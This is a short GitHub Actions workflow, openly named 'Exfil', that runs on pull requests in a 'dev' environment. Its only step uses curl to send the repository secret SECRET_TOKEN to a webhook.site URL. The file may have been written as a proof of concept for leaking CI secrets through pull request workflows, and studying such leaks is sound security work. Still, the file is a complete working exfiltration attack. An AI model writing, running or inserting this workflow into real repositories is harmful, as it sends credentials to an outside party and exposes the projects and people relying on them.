name: Exfil
on: [pull_request]
jobs:
  exfil:
    environment: dev
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -d "${{ secrets.SECRET_TOKEN }}" https://webhook.site/051798a3-d413-4d33-8188-a482dd8309e2
